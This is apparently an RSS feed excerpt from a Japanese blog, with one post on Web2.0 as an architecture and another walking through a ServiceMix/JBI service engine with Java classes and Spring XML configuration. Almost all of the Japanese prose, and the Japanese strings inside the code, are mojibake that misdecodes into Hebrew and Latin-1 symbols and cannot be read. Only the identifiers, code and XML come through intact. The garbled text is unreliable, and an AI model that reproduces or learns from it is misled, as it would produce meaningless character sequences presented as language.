    Amazon₪ַ¾₪·₪¯¸«₪כ by G-Tools -]]> -₪½₪־ֲ¾₪־ֲֳֿך -yusuke -2005-12-19T16:40:26+09:00 - - -₪₪¼Web2.0₪ֿ³₪·₪₪₪־₪« -http://www.arclamp.jp/blog/archives/000741.html -¡¡¥»¥¹¡¦¥´¡¼¥ֹ¥¦¥£¥ף»ב₪ֻ₪ט₪ל₪׀Web2.0₪ֿµ»½ׁ₪ַ₪ֿ₪₪¯ֲײֵ₪ַ₪¹¡Seth's Blog : Tim O. on Web 2.0¡ֻ¡£₪ַ₪ֿ¡¢₪₪¼Web2.0ֵ×₪ַ₪¢₪כ₪³₪ָ₪ֿ³₪·₪₪₪־₪«¡©

    - -

    ¡¡ֻֽ₪¬»׳₪¦₪ֻ¡¢₪½₪ל₪ֿWeb2.0₪¬¥¢¡¼¥ָ₪ְ₪«₪י¡£

    - -

    ¡¡Web2.0₪ע¼¨₪¹"Mush-up"₪ָ₪₪₪¦¸ְֽױ₪ֿ¡¢¸µ¡¹¥ׂ¥ֳ¥׳¥¥ֳ¥׳₪־¥¢¡¼¥ֶ¥£¥¹¥ֳָ£₪¬¡¢₪₪₪ם₪ף₪¶₪ע¥³¥י¡¼¥¸¥ו₪·₪ֶ¿·₪·₪₪¶₪ע÷מ₪ך½׀₪¹₪³₪ָ₪ע₪µ₪·₪₪¹¡£

    - -

    ¡¡AJAX₪־³₪·₪µ₪ֿHTML₪ֻ½¾₪¦₪־₪ַ₪ֿ₪₪¯HTML₪ע¥³¥ף¥ָ¥ם¡¼¥כ₪·¡¢¥ַ¡¼¥¿₪ע½׀־ֿ₪¹₪כ₪־₪ַ₪ֿ₪₪¯¥ַ¡¼¥¿₪עֹ½¸½₪¹₪כ₪³₪ָ₪ַ₪¹¡£
    -¡¡₪ָ₪¯₪ֻ¥ֿ¥ֳ¥¯₪ֿ÷ַ¹ג₪־¥¢¡¼¥ָ₪ַ₪¹¡£ֻֽ₪¬₪ֿ₪ֶ₪¥¥ֳ¥׳₪ע¥ֿ¥ֳ¥¯₪·₪ֶ¥ײ¥ֳ¥¯¥¡¼¥¯¥ל¥ֳ¥ָ₪ע÷מ₪ֳ₪¿»‏¡¢₪₪₪±₪₪₪₪³₪ָ₪ע₪·₪ֶ₪₪₪כ₪ָ₪₪₪¦´¶³׀₪ָ₪ָ₪ג₪ֻ¡¢ֹװ»׳µִ₪²ק´¶₪עְֶ₪כ₪³₪ָ₪¬½׀ֽט₪₪·₪¿¡£¸µ¡¹ֹ½¼¨₪µ₪ל₪ֶ₪₪₪¿HTML₪עinnerHTML = ''₪ַ₪ײ₪ֱ²ץ₪·¡¢ֶ±₪¸¥ַ¡¼¥¿₪ע»ָ₪ֳ₪ֱֶ´₪¯°ד₪¦ֹ½¸½₪ע₪¹₪כ¡£₪½₪³₪ֻ₪ֿ¿·₪·₪₪ֹ½¸½₪¬₪¢₪כ₪ן₪±₪ַ₪¹¡£

    - -

    ¡¡₪³₪־²ק´¶₪ֿ¥¢¡¼¥ָ₪ֲֻ¾₪₪ך₪₪»₪ף¡£

    - -

    ¡¡₪ג₪ֱ₪ם₪ף¥½¥ױ¥ָ¥¦¥§¥¢₪ע¥¢¡¼¥ָ₪ָ₪·₪ֶֽרֽׁ₪ַ₪­₪¿¿ֽ´ײ₪ג₪₪₪₪·₪¿¡£₪·₪«₪·¡¢₪½₪ל₪ֿ₪´₪¯¾¯¿פ₪־ֵ·÷ֽ¡¦½¨÷ֽ₪ֻ²ב₪®₪₪«₪ֳ₪¿ּץ₪ַ₪¹¡£₪·₪«₪·Web2.0₪־µ»½ֵׁ×₪¥ך¡¼¥ֱ₪¬ָף¾ן₪ִֻ¹₪¯¡¢₪½₪·₪ֶ¡¢¥½¥ױ¥ָ¥¦¥§¥¢₪¬÷ַ₪גְֶ°ױ₪ָ₪¹₪כ»כ³׀₪ֱֻ₪¨₪י₪ל₪¿¡₪ֳ₪ֶ₪₪₪¦₪«PC₪¬₪½₪ל°³°₪ֱֻ₪¨₪«₪±₪כ₪־₪¬ֶס₪·₪₪₪«₪י¡ֻ¡£

    - -

    ¡¡₪³₪ל₪₪ַ¥¢¡¼¥ָ₪ע¶״₪¸₪י₪ל₪ֶ₪­₪¿²¿ֹ´ֻ₪ָ₪₪₪¦¿ֽ¡¹₪¬°לְֶ₪ֻWeb2.0₪ָֻפ₪׃₪ִ₪₪₪¿₪־₪ֿ²¿₪־ֹװ»׳µִ₪ג₪¢₪ך₪₪»₪ף¡£

    - -

    ¡¡₪³₪ל₪₪ַ₪־¥½¥ױ¥ָ¥¦¥§¥¢³«ָ¯₪ֿ¡¢¾נף₪עֶ‏־ֿ₪·½׀־ֿ₪¹₪כ₪³₪ָ₪¬ֵּ×₪ַ₪·₪¿¡£₪·₪«₪·¡¢Web2.0₪ֿ¾נף₪ע½¸₪ב¡¢ְ₪ך¼ט₪ך¡¢÷®₪¼¡¢₪ִ₪₪®ִ¾₪·¡¢"¾נף₪עֹ½¸½₪¹₪כ"₪³₪ָ₪¬ֵּ×₪ַ₪¹¡£

    - -

    ¡¡ֹ½¸½₪ָ₪ֿ¡¢¼­½ס₪ֻ₪ט₪ל₪׀¼¡₪־₪ט₪¦₪°ױּ£₪ע»‎₪ֱ₪₪¹¡£

    - -
    ֶגֵּּס¦ְ÷¿ְֵס¦¼חֲ־ֵ×₪»׳ֱ₪ה´¶¾נ₪₪ֹ₪ע¡¢³°ֵּּס¦µׂ´ֵׁ×₪·ֱ₪¢₪כ₪ג₪־₪ָ₪·₪ֶֹ½₪¹₪³₪ָ¡£₪₪¿¡¢₪½₪־ֹ½₪ל₪¿·ֱ₪ַ₪¢₪כֹ½¾נ¡¦¿ָ¿¶₪ך¡¦µ­¹ז¡¦¸ְ¸ל₪₪ֹ¡£ֳֶ₪ֻ¡¢·½ֵׁ×·ֱ¾₪¿₪כ¸³״÷מֹ¡»ם¡¦¾®ְג₪₪ֹ¡ֻ¡¦²»³¡¦³¨²ט¡¦ֲ₪·ֱ₪₪ֹ¡£
    - -

    ¡¡Web2.0₪־³₪·₪µ¡£₪½₪ל₪ֿµ»½ׁ₪ה¥ַ¡¼¥¿₪ע¥½¡¼¥¹¡ֱַ÷א¡ֻ₪ָ₪·₪ֶ¡¢₪½₪־¾ו₪ֹֻױ₪±²ֳ₪¨₪י₪ל₪¿¿·₪¿₪"ֹ½¸½"₪½₪־₪ג₪־₪₪ן₪±₪ַ₪¹¡£

    - -


    -¡¡₪¿₪ְ¥¢¡¼¥ָ₪¬ת₪¨₪ֶ₪₪₪כ¼ְֲֽׁ­₪ָ₪₪₪¦ּהֲך₪ע°ת₪­₪÷₪ֳ₪ֶ₪₪₪כ₪־₪גְµ₪·₪₪₪ַ₪·₪ח₪¦¡£ֻֽ₪גAjax₪ע¶ָּ³¥·¥¹¥ֶ¥א₪ֻ»ָ₪¦₪־₪ֿ₪ֹ₪¦₪«₪ָ»׳₪₪₪₪¹¡£

    - -

    ¡¡₪ַ₪גֻֽ₪ֿ¡¢¥·¥¹¥ֶ¥א³«ָ¯₪ֿ¥¢¡¼¥ָ₪ֻ₪₪ך₪¦₪כ₪ָ¿®₪¸₪ֶ₪₪₪₪¹¡£

    - -

    ¡¡ֲ¿₪¯₪־·תֳ²ָ₪¬¹ג₪₪²ֱֳֽ₪עִף¶¡₪·¡¢ֹ¾²ֱ₪µ₪ל₪כ¡£₪₪ְ¥·¥¹¥ֶ¥א³«ָ¯₪ֻ₪ֿ÷ִַד¸ֲ₪־°ֱֲ´ְ­₪ג¥כ¡¼¥כ₪ג₪¢₪ך₪₪»₪ף¡₪ְ₪«₪יµ¶ֲ₪₪₪ף₪ֶ₪·₪ט₪¦₪ג₪₪₪₪ן₪±₪ַ₪¹₪ט¡ֻ¡£₪ַ₪ג¡¢₪₪₪ִ₪־ֶ₪«¡¢₪½₪³₪ֻ³₪·₪₪¬»÷₪₪ל₪כ₪³₪ָ₪ָ¿®₪¸₪ֶ₪₪₪₪¹¡£

    - -


    -¡¡ServiceMix₪ֻ₪ט₪ֳ₪ֶGoogle Map₪ָJBI₪עֱָ₪¹ח₪ן₪»₪כ¡£SOA₪־µ»½ׁ₪עWeb2.0ֵ×₪ֻ»ָ₪¦₪ָ₪₪₪¦₪־₪ֿ¡¢¶ָּ³¥·¥¹¥ֶ¥א₪־ּ₪ֽט₪ע₪·₪ב₪¹ֻֽ₪₪ך₪־¥¢¡¼¥ָ₪ְ₪ֳ₪¿₪־₪«₪ג₪·₪ל₪₪»₪ף¡£

    ]]>
    -¥½¥ױ¥ָ¥¦¥§¥¢¥ַ¥¶¥₪¥ף -yusuke -2005-12-19T01:00:11+09:00 -
    - -ServiceMix (5) InfoProvider₪־÷מ₪ך‎ -http://www.arclamp.jp/blog/archives/000745.html -¡¡÷£²ף₪ֿServiceMix₪ֻ¥ַ¥׳¥ם¥₪₪¹₪כServiceEngine¡SE¡ֻ₪־÷מ₪ך‎₪ע¹ֽ₪¨₪ֶ₪₪₪­₪¿₪₪₪ָ»׳₪₪₪₪¹¡£ֳֶ₪ֻ¥׃¥¸¥ֽ¥¹¥ם¥¸¥ֳ¥¯₪ַ₪¢₪כInfoProvider₪ַ₪¹¡£

    - -

    ¡¡²¿ֵ₪ג½ס₪₪₪ֶ₪₪₪₪¹₪¬InfoProvider₪ֿ¾ע·ן₪ֻ±‏₪¸₪ֶ¾נף₪עײ₪¹»ֱֵָ₪₪ַ₪¹¡£₪·₪«₪·¡¢₪₪₪«₪ֻServiceMix₪¬´ֳ±₪ָ₪ֿ₪₪₪¨JBI₪־»ֵֽֽ₪ֻ₪½₪ֳ₪¿¥ב¥ֳ¥»¡¼¥¸ֱק¿®₪ע½ס₪¯₪־₪ֲֿחׁ₪ַ₪¹¡£₪½₪³₪ַ¡¢InfoProvider₪־¥³¥¢₪ַ₪¢₪כ¥ם¥¸¥ֳ¥¯ֹפ¬₪ָ¡¢₪½₪ל₪עServiceMix¡JBI¡ֻ¾ו₪ֶַ°₪«₪¹₪¿₪ב₪־¥³¡¼¥ֹ₪ע¬־¥₪·₪ֶ₪·₪₪¦‎ֻ¡₪ע¹ֽ₪¨₪₪·₪ח₪¦¡£»²¹ֽ₪ֻ₪¹₪כ₪־₪ֿServiceMix¼«¿ָ₪¬¥¢¥¯¥ֶ¥£¥¡¼¥ָ₪ַ»ָ₪ֳ₪ֶ₪₪₪כ¥ֶ¥¯¥ֻ¥ֳ¥¯₪ַ₪¹¡£

    - -

    ¡¡₪₪÷¡¢InfoProvider₪עServiceMix₪ֻ°ֲֽ¸₪·₪₪₪₪ט₪¦₪ֻ¹ֽ₪¨₪כ₪ָ¡¢¼¡₪־₪ט₪¦₪¥₪¥ף¥¿¡¼¥ױ¥§¡¼¥¹₪ֻ₪₪ך₪₪¹¡£
    -


    -package demo.info;

    - -

    import java.util.Map;

    - -

    public interface InfoProvider {
    -  Info[] getInfos(Map condition);
    -}
    -

    - -

    ¡¡₪₪¿¡¢¥¯¥י¥¹Info₪ֿ¼¡₪־₪ט₪¦₪ֻ₪₪ך₪₪¹¡£

    - -
    -package demo.info; - -

    public class Info {
    -  private String id;
    -  private String lat;
    -  private String lng;
    -  private String imgSrc;
    -  private String title;
    -  private String message;

    - -

      //³ֶGetter₪ָSetter
    -

    - -

    ¡¡₪³₪־¾ץֲײ₪ַ₪ֿ¥ׁ¥י¥ב¥¿₪ע¥¯¥י¥¹Map¡¢ײµׁ₪ע¥¯¥י¥¹Info₪ֻ₪ט₪ֳ₪ֶ¹װ₪ֳ₪ֶ₪×₪ך¡¢ServiceMix₪ָֻ°ֲֽ¸₪ַ₪¢₪ך¡¢ֳ±ֲ־¥ֶ¥¹¥ָ₪גָף¾ן₪ֻ´ֳ±₪ֻ¹װ₪¨₪כ₪³₪ָ₪¬₪ן₪«₪ך₪₪¹¡£¼ֱֲץ־ד₪ֿ¼¡₪־₪ָ₪×₪ך₪ַ₪¹¡£

    - -
    -package demo.info.impl; - -

    import java.util.Map;

    - -

    import demo.info.Info;
    -import demo.info.InfoProvider;

    - -

    public class InfoProviderImpl1 implements InfoProvider {

    - -

      public Info[] getInfos(Map condition) {
    -    Info[] infos = new Info[2];
    -    infos[0] = new Info("simple1_1", "34.991305", "135.750579", "", "ֻ´ך»¡ְ¾ֻ´ך»¡ֻ", "...");
    -    if ( "family".equals(condition.get("group")) ) {
    -      infos[1] = new Info("simple1_2", "35.010271", "135.768378", "", "ַֻ½»¡²ֲָ²¸‏₪­¡ֻ", "...");
    -    }
    -    else if ( "friends".equals(condition.get("group")) ) {
    -      ....
    -    }
    -    return infos;
    -  }
    -}
    -

    - -


    -¡¡₪·₪«₪·¡¢₪³₪־₪₪₪ַ₪ֿServiceMix¾ו₪ֻ¥ַ¥׳¥ם¥₪₪¹₪כ₪³₪ָ₪ֿ₪ַ₪­₪₪»₪ף¡£₪½₪³₪ַ¡¢₪³₪ל₪ֻServiceMixֽׁ₪־¥¢¥ְ¥׳¥¿₪ע₪ִ₪±₪ֶ½טֽ‎₪ע¹װ₪ן₪»₪כ₪³₪ָ₪ֻ₪·₪₪¹¡£¥¢¥ְ¥׳¥¿₪־ּע³ה₪ֿ¡¢
    - 1.JBI₪־¥ב¥ֳ¥»¡¼¥¸₪ֶַֿ₪±₪י₪ל₪¿¥ׁ¥י¥ב¥¿₪־XML₪ע¥¯¥י¥¹Map₪ֻׁ´¹
    - 2.InfoProvider₪ע¸ֶ₪׃½׀₪·
    - 3.¼ֲ¹װ·כ²ּ₪־¥¯¥י¥¹Info₪עXML₪ֻ₪·₪ֶ¥ב¥ֳ¥»¡¼¥¸₪עײµׁ
    -₪ַ₪¹¡£

    - -

    ¡¡¥¢¥ְ¥׳¥¿₪עֽרֽׁ₪¹₪כ₪־₪ֿDI₪עֽרֽׁ₪·₪₪¹¡£¥¢¥ְ¥׳¥¿¥¯¥י¥¹ֲ¦₪ֻInfoProvider₪עֲ°ְ­₪ָ₪·₪ֶֽׁ°ױ₪·¡¢₪½₪³₪ֻ¼ֲ¹װ₪·₪¿₪₪InfoProvider₪־¼ֱֲץ₪ע¥₪¥ף¥¸¥§¥¯¥ָ₪¹₪כ₪־₪ַ₪¹¡£ֱ°¥¨¥ף¥ָ¥ך₪ַ½ס₪₪₪¿servicemix.xml₪ע¸«₪כ₪ָ¡¢¥¯¥י¥¹demo.servicemix.se.Adaptor₪־ֲ°ְ­infoProvider₪ֲֻ׀₪·₪ֶInfoProvider₪־¼ֱֲץ¥¯¥י¥¹demo.info.impl.InfoProviderImpl1₪¬¥₪¥ף¥¸¥§¥¯₪ָ₪µ₪ל₪ֶ₪₪₪₪¹¡ְײ₪₪ֹפ¬¡ֻ¡£

    - -
    -  <sm:activationSpec componentName="provider1"   
    -      service="foo:provider1"
    -      destinationService="foo:findAggregator">
    -    <sm:component>
    -      <bean xmlns="http://xbean.org/schemas/spring/1.0"
    -          class="demo.servicemix.se.Adaptor">
    -        <property name="infoProvider">
    -          <bean class="demo.info.impl.InfoProviderImpl1" />
    -        </property>
    -      </bean>
    -    </sm:component>
    -  </sm:activationSpec>
    -
    - -

    ¡¡₪³₪־XML₪ע₪₪כ₪ָactivationSpec₪ֻ₪ט₪ֳ₪ֶJBI₪״₪־ֵ׀ֿ¿₪ע¹װ₪₪¡¢component₪ֻ₪ט₪ֳ₪ֶ¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪־½י´²½₪ע¹װ₪₪¡¢¥¯¥י¥¹Adaptor₪ֻ₪ט₪ֳ₪ֶJBI₪־½טֽ‎₪ע±£ֳ₪·₪ֶ₪₪₪כ₪³₪ָ₪ֻ₪₪ך₪₪¹¡£
    -¡¡₪³₪־₪ט₪¦₪ֻµ¡ַ½₪־¹חְ®₪ע¥₪¥ף¥¸¥§¥¯¥ָ₪ֻ₪ט₪ֳ₪ֶ´ֳ±₪ֹֻ½¸½₪ַ₪­₪כ₪־₪¬DI₪־ֳִֶ§₪ַ₪¹¡£₪³₪ל₪₪ַ₪ַ₪¢₪ל₪׀·ׁ¾µ₪ֻ₪ט₪כµ¡ַ½₪־¹חְ®₪ע₪·₪ֶ₪₪₪¿₪ג₪־₪¬¡¢¥₪¥ף¥¸¥§¥¯¥ָ₪ֻ₪ט₪ֳ₪ֶ¼ֲ¸½₪·₪ֶ₪₪₪כ₪ט₪¦₪ֻ₪ג´¶₪¸₪ֶ₪₪₪₪¹¡£

    - -

    ¡¡₪ַ₪ֿ¡¢¥¢¥ְ¥׳¥¿₪־¼ֱֲץ₪ע¸«₪₪¬₪י¡¢ServiceMix₪ַ₪־¼ֱֲץ‎ֻ¡₪ע¸«₪ֶ₪₪₪­₪₪·₪ח₪¦¡£

    - -
    -package demo.servicemix.se; - -

    import //־¬

    - -

    public class Adaptor extends ComponentSupport implements
    -    MessageExchangeListener { ...[1]

    - -

      private InfoProvider infoProvider; ...[2]
    -  public void setInfoProvider(InfoProvider infoProvider) {
    -    this.infoProvider = infoProvider;
    -  }

    - -

      private SourceTransformer transformer = new SourceTransformer(); ...[3]
    -  public void setTransformer(SourceTransformer transformer) {
    -    this.transformer = transformer;
    -  }

    - -

      private boolean encode = false; ...[4]
    -  public void setEncode(boolean encode) {
    -    this.encode = encode;
    -  }

    - -

      public void onMessageExchange(MessageExchange exchange)
    -      throws MessagingException { ...[5]

    - -

        if (exchange.getStatus() == ExchangeStatus.DONE) { ...[6]
    -      return;
    -    } else if (exchange.getStatus() == ExchangeStatus.ERROR) {
    -      done(exchange);
    -      return;
    -    }

    - -

        NormalizedMessage in = getInMessage(exchange); ...[7]

    - -

        Node docNode = null;
    -    try {
    -     docNode = transformer.toDOMNode(in.getContent()); ...[8]
    -    } catch (Exception e) {
    -      e.printStackTrace();
    -      fail(exchange, e);
    -    }

    - -

        Map queryParam = Util.createQueryMap((Element) docNode.getChildNodes().item(0)); ...[9]

    - -

        Info infos[] = infoProvider.getInfos(queryParam); ...[10]

    - -

        Element resultElem = Util.toElement(infos, encode); ...[11]

    - -

        InOnly inOnly = getExchangeFactory().createInOnlyExchange(); ...[12]
    -    NormalizedMessage out = inOnly.createMessage(); ...[13]
    -    out.setContent(new DOMSource(resultElem));
    -    inOnly.setInMessage(out);

    - -

        send(inOnly); ...[14]

    - -

      }

    - -

    }
    -

    - -


    -[1]₪₪÷¡¢ServiceMixֽׁ₪־SE₪ע¼ֱֲץ₪¹₪כ₪ֻ₪ֿ¥₪¥ף¥¿¡¼¥ױ¥§¡¼¥¹MessageExchangeListener₪ע¼ֱֲץ₪·₪₪¹¡£₪³₪־¥ב¥½¥ֳ¥ֹonMessageExchange₪ע¼ֱֲץ₪¹₪כ₪³₪ָ₪ַJBI₪־¥¢¥¯¥»¥׳¥ָ¥₪¥¥ף¥ָ₪ע¥ֿ¥ף¥ֹ¥ך¥ף¥°₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹¡£₪₪¿·ׁ¾µ₪·₪ֶ₪₪₪כ¥¯¥י¥¹ComponentSupport₪ֿ¡¢₪½₪־ּ¾₪־₪ָ₪×₪ךJBI¾ו₪־¥³¥ף¥¡¼¥ֽ¥ף¥ָ₪ע¼ֱֲץ₪¹₪כ₪¿₪ב₪־´נִל¥¯¥י¥¹₪ָ₪·₪ֶֽרֽׁ₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹¡£

    - -

    [2]¼ֲ÷₪ֻ¼ֲ¹װ₪¹₪כInfoProvider₪־¥₪¥ף¥¹¥¿¥ף¥¹₪ע¥₪¥ף¥¸¥§¥¯₪ָ₪·₪ֶ₪ג₪י₪¦₪¿₪ב₪ֲֻ°ְ­InfoProvider₪עֽׁ°ױ₪·₪₪¹¡£

    - -

    [3]SourceTransformer₪ֿJBI₪ַֽׁ°ױ₪µ₪ל₪¿JAXP₪־¥ז¡¼¥ֶ¥£¥ך¥ֶ¥£¥¯¥י¥¹₪ַ₪¹¡£

    - -

    [4]₪³₪ל₪ֻֿ¼ֱֵ×₪ַ₪ֿ₪₪₪₪־₪ַ₪¹₪¬¡¢URL¥¨¥ף¥³¡¼¥ֹ₪ע¹װ₪¦₪«₪ֹ₪¦₪«₪ע₪·₪ב₪¹₪¿₪ב₪־¥ױ¥י¥°₪ַ₪¹¡£¥ַ¥ג₪ַ₪ּֿ¥µ¡¼¥׀¥₪¥ף¥¹¥¿¥ף¥¹₪־ServiceMix₪ֻREST·׀ֽ³₪ַ½טֽ‎₪עֵך₪²₪כ¾ל¹ח₪ֶֻֻ¸ל₪־₪₪₪ְ₪ָ¸»ת²½₪±₪·₪ֶ₪·₪₪₪₪₪¹¡£₪½₪³₪ַURL¥¨¥ף¥³¡¼¥ֹ₪¹₪כ₪ן₪±₪ַ₪¹¡£

    - -

    [5]¥ב¥½¥ֳ¥ֹonMessageExchange₪¬¥₪¥ף¥¿¡¼¥ױ¥§¡¼¥¹MessageExchangeListener₪ִַךµֱ₪µ₪ל₪¿₪ג₪־₪ַ₪¹¡£°ת¿פ₪־¥¯¥י¥¹MessageExchange₪ֿJBI₪ֻ₪×₪±₪כ¥ב¥ֳ¥»¡¼¥¸¸ע´¹₪¿₪ב₪־¥×¥ײ¥¸¥§¥¯¥ָ₪ַ₪¹¡£

    - -

    [6]JBI₪ַ₪ֿ¡¢¥ב¥ֳ¥»¡¼¥¸₪¬ֱך¼ך₪ֶֻֿ₪₪₪ֶ½טֽ‎₪¬½×־»₪·₪¿₪³₪ָ₪ע¥³¡¼¥כ¥׀¥ֳ¥¯₪·₪ֶ₪¯₪ל₪₪¹¡£MessageExchange₪־¥ב¥½¥ֳ¥ֹgetStatus₪ֻ₪ט₪ֳ₪ֶ¾ץֲײ₪עֳ־₪כ₪³₪ָ₪¬₪ַ₪­₪₪¹¡£DONE₪ְֿµ¾ן½×־»¡¢ERROR₪ֿ°¾ן½×־»₪ע¼¨₪·₪₪¹₪¬¡¢₪ֹ₪ֱ₪י₪גֳֶ₪ֻ₪ֿ½טֽ‎₪ע¹װ₪₪₪₪»₪ף¡£

    - -

    [7]ComponentSupport₪־¥ב¥½¥ֳ¥ֹgetInMessage₪ֻ₪ט₪ֳ₪ֶ¡¢MessageExchange₪«₪יֶ‏־ֿ¡In¡ֻ₪־¥ב¥ֳ¥»¡¼¥¸NormalizedMessage₪ע¼ט₪ך½׀₪·₪₪¹¡£MessageExchange₪¬¹װ₪­ְט₪ה¥¹¥ֶ¡¼¥¿¥¹₪ע₪־₪¢₪י₪ן₪¹₪־₪ֲֻ׀₪·₪ֶ¡¢NormalizedMessage₪ֿ¥ב¥ֳ¥»¡¼¥¸₪½₪־₪ג₪־₪ע¼¨₪·¡¢XML¡¢¥׀¥₪¥¥ך₪־ֵ÷ֹױ¡¢ַ₪°ױ₪־¥׳¥ם¥ׁ¥ֶ¥£₪₪ֹ₪ע»‎₪ֱ₪₪¹¡£₪³₪־´»³ְטְ¸₪־³¨₪¬₪ן₪«₪ך₪ה₪¹₪₪₪ַ₪·₪ח₪¦₪«¡£
    -

    - -

    [8]NormalizedMessage₪«₪י¡¢₪µ₪י₪ְֻ¸₪־XML₪ע¼ט₪ך½׀₪·₪ֶDOM₪ֻׁ´¹₪·₪ֶ₪₪₪₪¹¡£

    - -

    [9]DOM₪עֱא÷מ₪·₪ֶ¡¢¥ׁ¥י¥ב¥¿ֽׁ₪־Map₪ע÷מ₪ך₪₪¹¡£₪ה₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪ֳֿ±½ד₪ַ¥¨¥ל¥ב¥ף¥ָ₪־ּ¾ֱ°₪ָ¥־¡¼¥ֳֹֽ₪עMap₪ֻ₪₪₪ל₪ֶ₪₪₪כ₪ְ₪±₪ַ₪¹¡£¼¡₪־₪ט₪¦₪XML₪ַ₪¢₪ל₪׀¡¢numberOfPerson:4₪ָ¡¢group:family₪ָ₪₪₪¦₪³₪ָ₪ֻ₪₪ך₪₪¹¡£

    - -
    -<request>
    -  <numberOfPerson>4</numberOfPerson>
    -  <group>family</group>
    -<request>
    -
    - -

    [10]₪₪₪ט₪₪₪טInfoProvider₪ע¸ֶ₪׃½׀₪·₪₪¹¡£

    - -

    [11]·כ²ּ₪ָ₪·₪ֶInfo₪־ַ־ף₪¬¼טְֶ₪ַ₪­₪¿₪־₪ַ¡¢÷£ֵ₪ֿ₪½₪ל₪עDOM₪ֻׁ´¹₪·₪₪¹¡£₪³₪ֱ₪י₪ג₪ה₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪ֳֿ±½ד₪ַ¡¢¼¡₪־₪ט₪¦₪XML₪ע÷מ₪ֳ₪ֶ₪₪₪כ₪ְ₪±₪ַ₪¹¡£

    - -
    -<infos>
    -  <info id="simple1_1" lat="34.991305" lng="... />
    -  ...
    -</infos>
    -
    - -

    [12]₪ַ₪ֿ¡¢¥ב¥ֳ¥»¡¼¥¸₪־ײ»צ₪ע¹װ₪₪₪₪¹¡£₪₪÷¥ב¥½¥ֳ¥ֹgetExchangeFactory₪עֽרֽׁ₪·₪ֶ¡¢₪³₪־SE₪ְִֻך₪µ₪ל₪¿¥¯¥י¥¹MessageExchangeFactory₪ע¼טְֶ₪·¡¢ָףֶ±´¡InOnly¡ֻ₪־ײ¿®ֽׁMessageEchange₪ע÷מ₪ך₪₪¹¡£₪ֱ₪₪₪ֻ¥ב¥½¥ֳ¥ֹcreateExchange₪ע»ָ₪¨₪׀ְּ¼¨ֵ×₪ֻ¥µ¡¼¥׃¥¹₪ֲֻ׀±‏₪·₪¿MessageExchange₪ע÷מ₪כ₪³₪ָ₪ג₪ַ₪­₪₪¹¡£

    - -

    [13]¼¡₪ֻײ¿®ֽׁMessageExchange₪־¥ב¥½¥ֳ¥ֹcreateMessage₪עֽרֽׁ₪·₪ֶNormalizedMessage₪ע÷מ₪ך₪₪¹¡£₪½₪³₪ְֻט₪₪ֹ₪־Info₪עXML²½₪·₪¿₪ג₪־₪ע־®₪·¹‏₪₪₪¹¡£

    - -

    [14]÷ַ¸ו₪ֻײ¿®ֽׁMessageExchange₪עNMR₪ֱֻק¿®₪·₪ֶ½×־»₪ַ₪¹¡£ֶגֹפֵ×₪ֻ₪ֿ¥ַ¥ך¥׀¥ך¡¼¥ֱ¥ד¥ף¥ֽ¥כ₪ע¼טְֶ₪·₪ֶ¡¢₪½₪³₪ֱֻק¿®₪ע¹װ₪ֳ₪ֶ₪₪₪₪¹¡£

    - -


    -¡¡₪³₪¦₪·₪ֶ₪₪ֶ₪ג₪י₪¦₪ֶָס₪·₪½₪¦₪¡¢´ֳ±₪½₪¦₪¡¢ָשּ¯₪´¶₪¸₪ְ₪ָ»׳₪₪₪₪¹¡£ק¡£₪¿₪ְ¡¢¥ב¥₪¥ף₪־¥׃¥¸¥ֽ¥¹¥ם¥¸¥ֳ¥¯¼«ֲ־₪ֿ¡¢₪³₪־¥¢¥ְ¥׳¥¿₪ע»ָ₪¦₪³₪ָ₪ֻ₪ט₪ֳ₪ֶ¥·¥ף¥׳¥כ₪ֻ₪¿₪ל₪ֶ₪₪₪כ₪³₪ָ₪¬₪ן₪«₪ך₪₪¹₪«₪י¡¢JBI₪ֻ°ֲֽ¸₪¹₪כֹפ¬₪ָ¡¢₪·₪₪₪ֹפ¬₪ע¬־¥₪·₪ֶ₪₪₪¯₪ָ₪₪₪¦ְן־¬¼«ֲ־₪ֻּהֲך₪ֿ₪₪₪₪ַ₪·₪ח₪¦¡£

    - -

    ¡¡ֻֽ₪¬ServiceMix₪־²ֲך₪ָ½ס₪₪₪¿₪־₪ֿ¥¢¥ְ¥׳¥¿₪ֻ₪¢₪¿₪כֹפ¬₪־¥µ¥¡¼¥ָ₪ַ₪¹¡£Struts₪¬HTTP¥ך¥¯¥¨¥¹¥ָ₪־¥ׁ¥י¥ב¥¿₪עActionForm₪ֻ₪·₪¿₪ט₪¦₪ֻ¡¢JBI₪־¥ב¥ֳ¥»¡¼¥¸₪ע₪ג₪ֳ₪ָ´ֳ±₪ֻ¥ֿ¥ף¥ֹ¥ך¥ף¥°₪¹₪כµ¡¹½₪¬₪¢₪כ₪ָ״ֽר₪₪ֿ₪÷₪ַ₪¹¡£₪¿₪ָ₪¨₪׀¡¢ESB¥ב¥ֳ¥»¡¼¥¸¥ף¥°¡¦¥ױ¥ל¡¼¥א¥ן¡¼¥¯₪־Mule₪ַ₪¢₪ל₪׀¡¢BindingComponent₪ֻ₪¢₪¿₪כֱ״₪ֻ¥ָ¥י¥ף¥¹¥ױ¥©¡¼¥¡¼µ¡¹½₪¬ֽׁ°ױ₪µ₪ל₪ֶ₪₪₪ֶ¡¢₪¢₪כִרֵ₪ֿ¼«ֶ°ֵ×₪ֻ¥ב¥ֳ¥»¡¼¥¸₪ע¥×¥ײ¥¸¥§¥¯¥ָ₪ֻ¥׀¥₪¥ף¥ֹ₪·₪ֶ₪¯₪ל₪₪¹¡£

    - -

    ¡¡₪₪ס¢÷£²ף₪־¥ַ¥ג₪ַ₪ֿ¥¯¥י¥¹Adaptor°³°₪ֻ₪ג¡¢₪₪₪¯₪ִ₪«₪־¥¯¥י¥¹₪ע÷מ₪ך₪₪·₪¿₪¬¡¢ֵֶָֽׁ×₪µ¡ַ½₪ַ₪¹¡£÷£¸ו₪ֿ¥י¥₪¥ײ¥י¥ך₪ָ₪·₪ֶֽׁ°ױ₪µ₪ל₪ֶ₪₪₪¯₪«¡¢₪¢₪כ₪₪₪ֿBPEL₪הXSLT₪־₪ט₪¦₪¥׳¥ם¥»¥¹¡¦¥¨¥ף¥¸¥ף₪¬»ָ₪ן₪ל₪כ₪ט₪¦₪ֻ₪₪כ₪ָ»׳₪₪₪₪¹¡£

    - -


